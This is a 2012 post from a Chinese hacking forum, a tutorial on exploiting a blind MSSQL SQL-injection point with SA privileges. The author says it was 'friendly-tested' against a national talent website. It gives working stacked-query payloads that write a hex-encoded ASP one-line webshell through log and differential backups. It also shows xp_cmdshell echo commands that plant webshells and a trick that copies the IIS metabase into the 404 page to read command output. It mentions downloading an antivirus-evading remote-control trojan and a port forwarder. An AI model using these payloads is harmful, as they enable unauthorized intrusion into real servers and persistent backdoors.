找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2107|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
7 H* o1 `6 N8 W/ q6 P, g
* A. t3 e$ @9 A
$ ~) i! i) ?" C* W0 a9 t                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
' M, r6 W+ p; s5 p) d* c6 \& I# V# v) l
                                                                 - |3 k, D1 ?3 h& C3 B# E0 P4 ~, x
                                                                 
7 ~2 ]  H! y, F: T+ I, z5 w$ X7 q                                                                  论坛: http://www.90team.net/
# g# D! [+ A6 g7 {1 K% O9 ?; v) [6 [9 v& W% f: O8 V$ M

/ e4 r: z/ A. `$ N! |, x7 Z
$ i& V$ F- P, T2 |6 a1 D友情检测国家人才网! T# R9 n; V% I9 N% D

. e* Q% ^" p4 m6 Z0 ~" K; e- J! Y+ D% \" U) ?! @
内容:MSSQL注入SA权限不显错模式下的入侵
& X" i3 a" @: D3 x1 l( ]" e' O( ~

" o  v9 G; x* ~" \: A+ E0 {一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
/ i! n  C  c; W8 h7 e0 H; }2 f9 Q* _: d. Z  P
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
" ^# l0 V- Z/ s+ d1 a
/ A% L' r* V, C% }9 ~7 q$ Z- C. `+ j2 \# \' t% X: L5 q+ W- b
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
9 e0 U! F; W# ]% m, {6 \7 o4 R0 w9 U: d- R2 G4 J7 I! m! v0 |) U8 B
思路:
- X; y$ a. w6 \) V# x' s- H" Z( q* Y3 G' @( }) A5 ~- r
首先:
2 G1 U- t1 a4 o% A
0 a# l. l" c' ]通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。* @: }% g. m8 i  I; m6 Y) c
9 Q8 g7 S/ x) ^( _! @9 \2 j
1.日志备份获得Webshell
/ D6 r& L. B9 j( ~$ G5 b% O
' Z, ~& L) O7 I5 D: Z% g2.数据库差异备份获得Webshell. K. C" M' @. x
3 `5 n* [3 a6 \
4.直接下载免杀远控木马。
' v/ y" Y# p3 C1 P. O( G/ m) i* v8 f+ B) G; @3 ~$ \- i
5.直接下载LCX将服务器端口转发出来
0 Q+ n3 T+ N1 H) i1 [% I5 g2 `5 U# ~
/ d/ U0 h+ R, F# z6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。9 R! `4 S  w3 `% D

3 {( S( [" v$ G+ p# I$ H8 \. [* h5 T! F! y, }9 N6 P6 n+ X0 u' F
4 T3 t4 |$ Y6 O. V4 [/ H2 y; o
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
; I# `: _, T, r1 `. z  D' n8 W, c- C
5 N! J" q) k7 d0 O我直接演示后面一个方法
6 c* B  Y( y+ P" e% ^8 a. Z6 P# B0 y) q

) D9 Q& q6 b% l; n( \  J- U分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL , _+ Y+ I- k# o6 U/ W
4 a# |  R2 e5 O1 B) S
& G8 S. y. ~1 n$ l* R
8 @: f6 y/ t3 t$ h& P
0 z8 |; G0 G2 c
◆日志备份:
: r# ?4 b9 y' R3 ^
; P) o; j/ N% E9 r2 S& w  o8 w, Z2 p# K
1. 进行初始备份% E4 K: g+ P$ G" G  d! {
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--1 h( i! Y1 R8 u) V5 c; L; t
: T; j/ w. Y* ]- B5 S. j0 h7 o
2. 插入数据
% z# Q1 }( p) o;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
4 U- V7 G0 `  M" `" l6 [" A2 C( V1 R, U; E. L. U2 v
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
; J  M# D' V9 d$ [. U. v% s5 c4 K  
7 w; o+ y$ F9 r" a3. 备份并获得文件,删除临时表; R8 A  C& n9 c4 q; r% _" I$ B2 Y
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
% I4 c& l( E  {# V# y' V! _. z. K5 `

5 U+ U. l2 S1 s9 s& ^7 r) Y0 w2 P; A+ U4 S7 a  ~, V
◆数据库差异备份
( t. ]5 a& A- s9 Z+ w% A
% {$ Y: g6 H2 u(1. 进行差异备份准备工作
# s! Y( ^  h! [9 _
2 H; k  p7 G  D  n  o! y;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--( v/ \; X( }$ o% }
. s& O8 W7 q# q  d  m
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
; Z. c4 s2 g+ l5 c  A' I( c" O* W/ _' _ ) O/ C$ }2 Z0 S

0 c' X' O  I  j& Q# O6 E# r(2. 将数据写入到数据库4 ?- N3 ^: y- ]7 m9 A6 _9 i
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
( L3 g- ?% `* o2 B3 @* n5 s: i6 @8 Y% m8 M- v) d2 T; A
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
, V' f: f, X4 ^3 ~% O. x
0 }# f  s' ~# K# m, T& y' ]3. 备份数据库并清理临时文件/ t. p# K5 `! a1 r+ k' [. V! H

  K$ u: J& N5 G' l;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
1 h/ |9 g  U8 `, B, V3 f# [, d% f) e! u* i5 `; J4 X4 s
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ( p$ C1 b- y3 M  U! X" n

  J# F: [: ?8 f' u% a. L. p: J$ X- s$ ^2 z* Y) G5 j0 G
4 W4 z' n6 ^* j' n
用^转义字符来写ASP(一句话木马)文件的方法:   
9 b% G+ _4 U5 M: T4 |$ H2 f' h. a3 s; u$ W
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
# @5 ^/ @  |9 F5 J7 t6 G8 x" z: s$ z& \( m
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
5 ^# w4 N2 D/ N5 R
+ W, q( r/ ~3 O7 O) j8 C读取IIS配置信息获取web路径
) b7 }# m+ d+ O; M  n
' d; m) G) S5 G( ]7 _     
! l5 H* F9 L9 |9 M, M* k     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--% c3 V  v2 e; N7 \3 r7 D1 S/ n
9 p* A! j2 Q, `/ {  s9 }8 H4 i
执行命令2 q! A9 K5 \% Q, {( X
     0 v! F; c/ Q, i- \2 _) x
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
& C2 f1 J' F- A& D& W. P, {- X$ b/ n# \6 Z# B1 x& [# n* |. f

; d: D( q% m' A* N& Z, ?2 {5 e! M% y6 Q1 Y; E! @
9 Z4 C9 P, R3 U; `& F+ X

, B* L1 t/ G4 _- t) x
, n6 @+ W& T* P- Z# l
, z3 }& ?- ~- Q! o) z9 c+ G( ]: L, W. e) V5 j) M" D  d0 ~) N
, z( e1 ?  L" }. v
1 f: I4 S2 K6 h5 X
8 W$ j8 Z8 f2 W6 y
  q7 r6 I1 d1 z: |! z  W% {, J

: s7 ]6 k2 K; C: s: D0 t' J- X" ~5 I) T
1 e; Q, R" Y4 M: W
9 D. u* Z+ q  ?1 F4 I& u+ U( d, A
1 f( Q0 P0 a& p* k  b
0 r4 r  Q9 q- g! h3 }- s! z
; |  f( A1 K7 |/ p8 `
% C0 q: g2 }+ L! U& ?+ A6 W

, `6 q* m% d& F# ]) X. \: J
8 B( ]5 _, ^5 g/ ^: J: e9 i5 \  X' {% i! ~5 L4 {5 {, i3 K
* {) P3 Q. d. H7 a- `! B8 h" S

8 k( W; {! C3 c0 h
& g2 l# P; T" O5 O% ^0 p+ V3 E" d7 L' _# v: W( H( ?5 d0 K' x0 r
/ k8 d( U9 {/ k
3 q1 f8 c4 y: g: F* C/ n; V$ D

8 C) r5 K5 {2 Z! U# M& W
# u/ h! R# m, N2 H
1 d  Q! X. w; l/ T; P! b7 h2 w+ U
1 r, }4 T% U: m* {% L4 L5 }& `4 s1 X/ c) ?
9 W% i' m- a  B  q8 V' ]

& ]  F, B' _6 u# i, f+ X- m
  ]) P6 G! g/ y( X) ?# ?- b# D; `+ p2 a' g6 M* g1 X3 e& c

& X  h/ l6 x8 Z0 P$ ~, u' R/ K  o% w; N3 E
) \& J% {( U( {; w* I

# E3 W/ \, W: _& Z/ Y  _: C9 J2 f) P* ^: P/ F
: X. ~7 a3 r8 R9 R/ R8 o% a
* T  c8 _' V! N5 ~* P
/ T7 i# q! n) e; S: }+ Q
8 r9 Z: U: b$ O/ x% n# S

/ w) Y9 u$ C  ^
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表